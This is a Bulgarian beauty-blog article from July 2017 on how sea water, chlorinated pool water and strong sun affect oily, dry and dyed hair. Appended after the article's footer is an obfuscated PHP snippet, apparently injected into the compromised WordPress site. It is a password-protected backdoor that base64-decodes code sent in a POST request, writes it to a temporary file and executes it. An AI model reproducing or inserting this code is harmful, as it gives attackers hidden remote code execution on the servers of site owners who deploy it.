Как морската вода влияе върху косата? | Косопад

Как морската вода влияе върху косата?

kosa-more

Какво въздействие ще окаже морската вода върху косата ни, зависи от това към кой тип принадлежи.

Ако е мазна, оказва благоприятно влияние. Морската вода облекчава сърбежа на кожата и елиминира пърхота. Освен това, я прави по- красива – придава й мекота и повече обем.

При нормална или  суха коса обаче, въздействието е по- скоро негативно. Причината е във високото рН на солената вода – 7, 8. Заради него, косата губи блясъка и обема си. Също така, намалява еластичността на косъма. В тези случаи се препоръчва носенето на плувна шапка или специална козметика за коса.

kosa-more-1

Морето не влияе добре и върху боядисаната коса, тъй като тя се обезцветява много бързо. Така че, е добре да се боядисаме точно преди почивката. След излизане от морето, се препоръчва добре да измием косата с хладка вода.

Водата в басейните обаче също не трябва да се подчинява заради хлора. Той изсушава косата и я чупи. Препоръчва се да я мием преди и след влизане в басейна.

Освен с водата, трябва да мислим и за силното слънце, което изтощава косата. Добре е да я подхранваме с балсам и маска, както и да я крием от лъчите.

През лятото, като цяло, не се препоръчва да се използва сешоар, а също е добре да се ограничава и пресата. Заради слънцето и морето, косата бързо се изтощава и може да започне да капе или да много да нацъфти.

11. юли 2017 12:50:05 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}